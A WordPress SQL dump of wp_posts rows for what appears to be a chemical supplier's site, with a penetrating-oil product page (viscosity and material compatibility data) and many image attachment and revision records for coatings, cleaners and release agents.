INSERT INTO `wp_posts` VALUES (1729, 2, '2016-09-16 18:13:15', '2016-09-16 18:13:15', '<h3>Miller-Stephenson Penetrating Oil</h3>\r\nMiller-Stephenson\'s Penetrating Oil is fast acting to free rusted nuts and bolts, hinges, locks, pipe threads, chains, clamps and latches. The low surface tension carrier solvent and synthetic lubricating oil penetrate the tightest crevices. Apply the Penetrating Oil liberally and allow to soak for a few minutes. If the parts are heavily rusted, tapping or vibrating the parts will help. Contains no silicones. Safe for all metals as well as plastics and elastomers.\r\n<h4>Properties of Synthetic Penetrating Oil:</h4>\r\nKinematic Viscosity, cSt@212°F/100°C: 1.7\r\n\r\nKinematic Viscosity, cSt@104°F/40°C: 5.1\r\n\r\nKinematic Viscosity, cSt@-40°F/-40°C: 260\r\n\r\nPour Point -99°F/-73°C\r\n\r\nPlastic Compatibility:\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Acetal</li>\r\n 	<li>Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>Liquid Crystal Polymer</li>\r\n 	<li>Polyester, PBT, PET</li>\r\n 	<li>Epoxy</li>\r\n 	<li>Polysulfone, PSO</li>\r\n 	<li>PEK, PEEK</li>\r\n 	<li>Polyimides</li>\r\n 	<li>Teflon®, PTFE</li>\r\n 	<li>Phenolic</li>\r\n 	<li>Polyvinylchloride</li>\r\n</ul>\r\nNOTE: Acrylics, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n\r\nELASTOMER COMPATIBILITY:\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Butyl Rubber Natural Rubber</li>\r\n 	<li>Polysulfide EPDM</li>\r\n 	<li>Buna S Buna N</li>\r\n 	<li>Neoprene Urethane</li>\r\n 	<li>Chlorosulfonated PE Silicone</li>\r\n 	<li>Viton®B</li>\r\n</ul>\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Test for compatibility before use.\r\n\r\nMETAL COMPATIBILITY:\r\n\r\n(Immersion: 2 weeks at 99°F/37°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n</ul>\r\nNote: Test for compatibility before use. This product is odorless, and has a low order of toxicity.\r\n\r\nSafety Data Sheets (SDS) are available upon request.', 'Penetrating Oil', '<strong>Synthetic lubricating oil to penetrate the tightest crevices</strong>\r\n\r\nThe penetrating oil is fast-acting to free rusted nuts and bolts, hinges, locks, pipe threads, chains, clamps and latches. Contains no silicones. Safe for all metals as well as plastics and elastomers.', 'publish', 'open', 'closed', '', 'penetrating-oil', '', '', '2016-12-19 17:57:47', '2016-12-19 17:57:47', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1729', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1730, 2, '2016-09-16 18:12:19', '2016-09-16 18:12:19', '', 'Penetrating Oil', '', 'inherit', 'open', 'closed', '', 'penetrating-oil-2', '', '', '2016-12-19 17:50:58', '2016-12-19 17:50:58', '', 1729, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/penetrating-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1731, 2, '2016-09-16 18:22:59', '2016-09-16 18:22:59', '', 'vydax-nrt-960', '', 'inherit', 'open', 'closed', '', 'vydax-nrt-960-2', '', '', '2016-09-16 18:22:59', '2016-09-16 18:22:59', '', 1683, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Vydax-NRT-960.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1732, 2, '2016-09-16 18:25:03', '2016-09-16 18:25:03', '', 'Conformal Coating Stripper', '114C AND 114D', 'inherit', 'open', 'closed', '', 'ms-114c-3', '', '', '2017-05-11 16:04:52', '2017-05-11 16:04:52', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-114C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1733, 2, '2016-09-16 18:25:17', '2016-09-16 18:25:17', '', 'ms-122ad', '', 'inherit', 'open', 'closed', '', 'ms-122ad-2', '', '', '2016-09-16 18:25:17', '2016-09-16 18:25:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-122AD.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1735, 2, '2016-09-16 18:25:39', '2016-09-16 18:25:39', '', 'ms-122se', '', 'inherit', 'open', 'closed', '', 'ms-122se-2', '', '', '2016-09-16 18:25:39', '2016-09-16 18:25:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-122SE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1736, 2, '2016-09-16 18:25:51', '2016-09-16 18:25:51', '', 'ms-122xd', '', 'inherit', 'open', 'closed', '', 'ms-122xd-2', '', '', '2016-09-16 18:25:51', '2016-09-16 18:25:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-122XD.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1737, 2, '2016-09-16 18:26:03', '2016-09-16 18:26:03', '', 'ms-143ax', '', 'inherit', 'open', 'closed', '', 'ms-143ax-3', '', '', '2016-09-16 18:26:03', '2016-09-16 18:26:03', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-143AX.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1738, 2, '2016-09-16 18:26:14', '2016-09-16 18:26:14', '', 'ms-143te', '', 'inherit', 'open', 'closed', '', 'ms-143te-3', '', '', '2016-09-16 18:26:14', '2016-09-16 18:26:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-143TE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1739, 2, '2016-09-16 18:26:25', '2016-09-16 18:26:25', '', 'ms-143xd', '', 'inherit', 'open', 'closed', '', 'ms-143xd-3', '', '', '2016-09-16 18:26:25', '2016-09-16 18:26:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-143XD.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1740, 2, '2016-09-16 18:26:36', '2016-09-16 18:26:36', '', 'ms-153bn', '', 'inherit', 'open', 'closed', '', 'ms-153bn-2', '', '', '2016-09-16 18:26:36', '2016-09-16 18:26:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-153BN.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1741, 2, '2016-09-16 18:26:46', '2016-09-16 18:26:46', '', 'ms-222l', '', 'inherit', 'open', 'closed', '', 'ms-222l', '', '', '2016-09-16 18:26:46', '2016-09-16 18:26:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-222L.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1742, 2, '2016-09-16 18:26:58', '2016-09-16 18:26:58', '', 'ms-222n', '', 'inherit', 'open', 'closed', '', 'ms-222n', '', '', '2016-09-16 18:26:58', '2016-09-16 18:26:58', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-222N.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1743, 2, '2016-09-16 18:27:09', '2016-09-16 18:27:09', '', 'ms-242l', '', 'inherit', 'open', 'closed', '', 'ms-242l', '', '', '2016-09-16 18:27:09', '2016-09-16 18:27:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-242L.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1744, 2, '2016-09-16 18:27:19', '2016-09-16 18:27:19', '', 'ms-242l-as', '', 'inherit', 'open', 'closed', '', 'ms-242l-as', '', '', '2016-09-16 18:27:19', '2016-09-16 18:27:19', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-242L-AS.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1745, 2, '2016-09-16 18:27:31', '2016-09-16 18:27:31', '', 'ms-250', '', 'inherit', 'open', 'closed', '', 'ms-250', '', '', '2016-09-16 18:27:31', '2016-09-16 18:27:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-250.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1746, 2, '2016-09-16 18:27:46', '2016-09-16 18:27:46', '', 'ms-255', '', 'inherit', 'open', 'closed', '', 'ms-255', '', '', '2016-09-16 18:27:46', '2016-09-16 18:27:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-255.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1747, 2, '2016-09-16 18:27:57', '2016-09-16 18:27:57', '', 'ms-260', '', 'inherit', 'open', 'closed', '', 'ms-260', '', '', '2016-09-16 18:27:57', '2016-09-16 18:27:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-260.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1748, 2, '2016-09-16 18:28:09', '2016-09-16 18:28:09', '', 'ms-280', '', 'inherit', 'open', 'closed', '', 'ms-280', '', '', '2016-09-16 18:28:09', '2016-09-16 18:28:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-280.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1749, 2, '2016-09-16 18:28:20', '2016-09-16 18:28:20', '', 'Varnish Conformal Coating', 'Varnish Conformal Coating', 'inherit', 'open', 'closed', '', 'ms-452n-2', '', '', '2016-10-24 17:02:54', '2016-10-24 17:02:54', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-452N.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1750, 2, '2016-09-16 18:28:35', '2016-09-16 18:28:35', '', 'Silicone Conformal Coatings', '', 'inherit', 'open', 'closed', '', 'ms-460h-2', '', '', '2016-11-24 03:42:22', '2016-11-24 03:42:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-460H.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1751, 2, '2016-09-16 18:28:45', '2016-09-16 18:28:45', '', 'Silicone Electronic Coating', '', 'inherit', 'open', 'closed', '', 'ms-462h-2', '', '', '2016-11-24 03:45:41', '2016-11-24 03:45:41', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-462H.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1752, 2, '2016-09-16 18:28:57', '2016-09-16 18:28:57', '', 'Acrylic Conformal', '', 'inherit', 'open', 'closed', '', 'ms-465c-2', '', '', '2016-11-24 03:40:48', '2016-11-24 03:40:48', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-465C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1753, 2, '2016-09-16 18:29:11', '2016-09-16 18:29:11', 'Acrylic Coating', 'Acrylic Coating', 'Acrylic Coating', 'inherit', 'open', 'closed', '', 'ms-467c-2', '', '', '2016-10-11 14:47:25', '2016-10-11 14:47:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-467C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1754, 2, '2016-09-16 18:29:23', '2016-09-16 18:29:23', '', 'Urethane Conformal Coatings', '', 'inherit', 'open', 'closed', '', 'ms-470c-2', '', '', '2016-11-24 03:20:35', '2016-11-24 03:20:35', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-470C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1755, 2, '2016-09-16 18:29:35', '2016-09-16 18:29:35', '', 'MIL-Spec Urethane Conformal Coating', '', 'inherit', 'open', 'closed', '', 'ms-470s', '', '', '2016-11-24 03:24:59', '2016-11-24 03:24:59', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-470S.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1756, 2, '2016-09-16 18:29:48', '2016-09-16 18:29:48', '', 'Urethane Coating MS-472C', '', 'inherit', 'open', 'closed', '', 'ms-472c-2', '', '', '2016-11-24 03:23:11', '2016-11-24 03:23:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-472C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1757, 2, '2016-09-16 18:29:59', '2016-09-16 18:29:59', '', 'Polyurethane Conformal Coatings ms-472s', '', 'inherit', 'open', 'closed', '', 'ms-472s-2', '', '', '2016-11-24 03:32:47', '2016-11-24 03:32:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-472S.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1758, 2, '2016-09-16 18:30:18', '2016-09-16 18:30:18', '', 'Acrylic Conformal Coatings MS-475C', '', 'inherit', 'open', 'closed', '', 'ms-475c-2', '', '', '2016-11-24 03:36:28', '2016-11-24 03:36:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-475C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1759, 2, '2016-09-16 18:30:29', '2016-09-16 18:30:29', '', 'Acrylic Conformal Coating MIL-SPEC', '', 'inherit', 'open', 'closed', '', 'ms-477c-2', '', '', '2016-11-24 03:37:47', '2016-11-24 03:37:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-477C.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1760, 2, '2016-09-16 18:30:40', '2016-09-16 18:30:40', '', 'ms-530n', '', 'inherit', 'open', 'closed', '', 'ms-530n', '', '', '2016-09-16 18:30:40', '2016-09-16 18:30:40', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-530N.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1761, 2, '2016-09-16 18:30:50', '2016-09-16 18:30:50', '', 'ms-550n', '', 'inherit', 'open', 'closed', '', 'ms-550n', '', '', '2016-09-16 18:30:50', '2016-09-16 18:30:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-550N.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1762, 2, '2016-09-16 18:31:04', '2016-09-16 18:31:04', '', 'ms-555-2', '', 'inherit', 'open', 'closed', '', 'ms-555-2', '', '', '2016-09-16 18:31:04', '2016-09-16 18:31:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-555-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1763, 2, '2016-09-16 18:31:18', '2016-09-16 18:31:18', '', 'ms-555', '', 'inherit', 'open', 'closed', '', 'ms-555', '', '', '2016-09-16 18:31:18', '2016-09-16 18:31:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-555.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1764, 2, '2016-09-16 18:31:31', '2016-09-16 18:31:31', '', 'ms-560', '', 'inherit', 'open', 'closed', '', 'ms-560', '', '', '2016-09-16 18:31:31', '2016-09-16 18:31:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-560.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1765, 2, '2016-09-16 18:31:42', '2016-09-16 18:31:42', 'Precision solvent cleaner', 'ms-580n', '', 'inherit', 'open', 'closed', '', 'ms-580n', '', '', '2016-09-19 15:42:52', '2016-09-19 15:42:52', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-580N.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1766, 2, '2016-09-16 18:31:56', '2016-09-16 18:31:56', 'Precision cleaning agent', 'ms-720', '', 'inherit', 'open', 'closed', '', 'ms-720', '', '', '2016-09-19 15:44:20', '2016-09-19 15:44:20', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-720.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1767, 2, '2016-09-16 18:32:07', '2016-09-16 18:32:07', '', 'ms-725', '', 'inherit', 'open', 'closed', '', 'ms-725', '', '', '2016-09-16 18:32:07', '2016-09-16 18:32:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-725.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1768, 2, '2016-09-16 18:32:18', '2016-09-16 18:32:18', '', 'ms-730', '', 'inherit', 'open', 'closed', '', 'ms-730', '', '', '2016-09-16 18:32:18', '2016-09-16 18:32:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-730.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1769, 2, '2016-09-16 18:32:30', '2016-09-16 18:32:30', '', 'ms-745', '', 'inherit', 'open', 'closed', '', 'ms-745', '', '', '2016-09-16 18:32:30', '2016-09-16 18:32:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-745.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1770, 2, '2016-09-16 18:32:45', '2016-09-16 18:32:45', '', 'ms-750', '', 'inherit', 'open', 'closed', '', 'ms-750', '', '', '2016-09-16 18:32:45', '2016-09-16 18:32:45', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-750.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1771, 2, '2016-09-16 18:32:58', '2016-09-16 18:32:58', '', 'ms-755', '', 'inherit', 'open', 'closed', '', 'ms-755', '', '', '2016-09-16 18:32:58', '2016-09-16 18:32:58', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-755.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1772, 2, '2016-09-16 18:33:09', '2016-09-16 18:33:09', '', 'ms-760', '', 'inherit', 'open', 'closed', '', 'ms-760', '', '', '2016-09-16 18:33:09', '2016-09-16 18:33:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-760.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1773, 2, '2016-09-16 18:33:24', '2016-09-16 18:33:24', '', 'ms-765', '', 'inherit', 'open', 'closed', '', 'ms-765', '', '', '2016-09-16 18:33:24', '2016-09-16 18:33:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-765.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1774, 2, '2016-09-16 18:33:36', '2016-09-16 18:33:36', '', 'ms-770', '', 'inherit', 'open', 'closed', '', 'ms-770', '', '', '2016-09-16 18:33:36', '2016-09-16 18:33:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-770.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1775, 2, '2016-09-16 18:33:48', '2016-09-16 18:33:48', '', 'ms-780', '', 'inherit', 'open', 'closed', '', 'ms-780', '', '', '2016-09-16 18:33:48', '2016-09-16 18:33:48', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-780.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1776, 2, '2016-09-16 18:34:00', '2016-09-16 18:34:00', '', 'ms-785', '', 'inherit', 'open', 'closed', '', 'ms-785', '', '', '2016-09-16 18:34:00', '2016-09-16 18:34:00', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-785.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1777, 2, '2016-09-16 18:34:12', '2016-09-16 18:34:12', '', 'ms-795', '', 'inherit', 'open', 'closed', '', 'ms-795', '', '', '2016-09-16 18:34:12', '2016-09-16 18:34:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-795.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1778, 2, '2016-09-16 18:34:24', '2016-09-16 18:34:24', '', 'releasys-82-2', '', 'inherit', 'open', 'closed', '', 'releasys-82-2', '', '', '2016-09-16 18:34:24', '2016-09-16 18:34:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-82-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1779, 2, '2016-09-16 18:34:39', '2016-09-16 18:34:39', '', 'releasys-85', '', 'inherit', 'open', 'closed', '', 'releasys-85-2', '', '', '2016-09-16 18:34:39', '2016-09-16 18:34:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Releasys-85.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1780, 2, '2016-09-16 18:34:51', '2016-09-16 18:34:51', '', 'releasys-88', '', 'inherit', 'open', 'closed', '', 'releasys-88-2', '', '', '2016-09-16 18:34:51', '2016-09-16 18:34:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-88.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1781, 2, '2016-09-16 18:35:06', '2016-09-16 18:35:06', '', 'releasys-89', '', 'inherit', 'open', 'closed', '', 'releasys-89-2', '', '', '2016-09-16 18:35:06', '2016-09-16 18:35:06', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Releasys-89.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1782, 2, '2016-09-16 18:35:17', '2016-09-16 18:35:17', '', 'releasys-8200', '', 'inherit', 'open', 'closed', '', 'releasys-8200-3', '', '', '2016-09-16 18:35:17', '2016-09-16 18:35:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Releasys-8200.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1783, 2, '2016-09-16 18:35:29', '2016-09-16 18:35:29', '', 'h0805a', '', 'inherit', 'open', 'closed', '', 'h0805a', '', '', '2016-09-16 18:35:29', '2016-09-16 18:35:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/H0805A.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1784, 2, '2016-09-16 18:35:44', '2016-09-16 18:35:44', '', 'teflon-silicone-lubricant', '', 'inherit', 'open', 'closed', '', 'teflon-silicone-lubricant-2', '', '', '2016-09-16 18:35:44', '2016-09-16 18:35:44', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Silicone-lubricant-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1785, 2, '2016-09-16 18:35:55', '2016-09-16 18:35:55', '', 'releasys-8500', '', 'inherit', 'open', 'closed', '', 'releasys-8500-3', '', '', '2016-09-16 18:35:55', '2016-09-16 18:35:55', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ReleaSys-8500.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1786, 2, '2016-09-16 18:36:08', '2016-09-16 18:36:08', '', 'releasys-8800', '', 'inherit', 'open', 'closed', '', 'releasys-8800-3', '', '', '2016-09-16 18:36:08', '2016-09-16 18:36:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ReleaSys-8800.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1787, 2, '2016-09-16 18:36:24', '2016-09-16 18:36:24', '', 'releasys-8900', '', 'inherit', 'open', 'closed', '', 'releasys-8900-3', '', '', '2016-09-16 18:36:24', '2016-09-16 18:36:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Releasys-8900.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1788, 2, '2016-09-16 18:36:35', '2016-09-16 18:36:35', '', 'silicone-oil-lubricant', '', 'inherit', 'open', 'closed', '', 'silicone-oil-lubricant', '', '', '2016-09-16 18:36:35', '2016-09-16 18:36:35', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Silicone-oil-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1789, 2, '2016-09-16 18:36:49', '2016-09-16 18:36:49', '', 'teflon-multi-use', '', 'inherit', 'open', 'closed', '', 'teflon-multi-use', '', '', '2016-09-16 18:36:49', '2016-09-16 18:36:49', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-multi-use.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1790, 2, '2016-09-16 18:37:01', '2016-09-16 18:37:01', '', 'teflone-multi-use', '', 'inherit', 'open', 'closed', '', 'teflone-multi-use', '', '', '2016-09-16 18:37:01', '2016-09-16 18:37:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflone-Multi-use.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1791, 2, '2016-09-19 13:11:03', '2016-09-19 13:11:03', '', 'MS-122AV', 'MS-122AV combines high-efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry.  This formulation yields superior adhesion of PTFE to metallic, glass, and non-plastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer.   MS-122AV advantages include:\n<ul>\n 	<li>Unparalleled release agent durability</li>\n 	<li>Ideal for difficult mold geometries</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\n<img src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-e1474290608761.jpg" alt="Krytox Authorized Distributor">', 'inherit', 'closed', 'closed', '', '182-autosave-v1', '', '', '2016-09-19 13:11:03', '2016-09-19 13:11:03', '', 182, 'https://132.148.10.86/wordpress/182-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1792, 2, '2016-09-19 13:09:55', '2016-09-19 13:09:55', '', 'krytox-authorized-distributor', '', 'inherit', 'open', 'closed', '', 'krytox-authorized-distributor', '', '', '2016-09-19 13:09:55', '2016-09-19 13:09:55', '', 347, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-authorized-distributor.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1793, 2, '2016-09-19 13:16:47', '2016-09-19 13:16:47', '', 'krytox-authorized-distributor-2', '', 'inherit', 'open', 'closed', '', 'krytox-authorized-distributor-2', '', '', '2016-09-19 13:16:47', '2016-09-19 13:16:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-authorized-distributor-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1794, 2, '2016-09-19 13:20:36', '2016-09-19 13:20:36', '', 'krytox-authorized-distributor-3', '', 'inherit', 'open', 'closed', '', 'krytox-authorized-distributor-3', '', '', '2016-09-19 13:20:36', '2016-09-19 13:20:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytox-authorized-distributor-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1796, 3, '2016-09-19 14:40:29', '2016-09-19 14:40:29', 'PTFE release agent', 'ms-122av', '', 'inherit', 'open', 'closed', '', 'ms-122av-2', '', '', '2016-09-19 14:40:51', '2016-09-19 14:40:51', '', 182, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-122AV.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1797, 3, '2016-09-19 15:16:15', '2016-09-19 15:16:15', '', 'releasys-82-2', '', 'inherit', 'open', 'closed', '', 'releasys-82-2-2', '', '', '2016-09-19 15:16:15', '2016-09-19 15:16:15', '', 400, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/RELEASYS-82-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1798, 3, '2016-09-19 15:17:54', '2016-09-19 15:17:54', '', 'releasys-85-2', '', 'inherit', 'open', 'closed', '', 'releasys-85-2-2', '', '', '2016-09-19 15:17:54', '2016-09-19 15:17:54', '', 419, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/RELEASYS-85-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
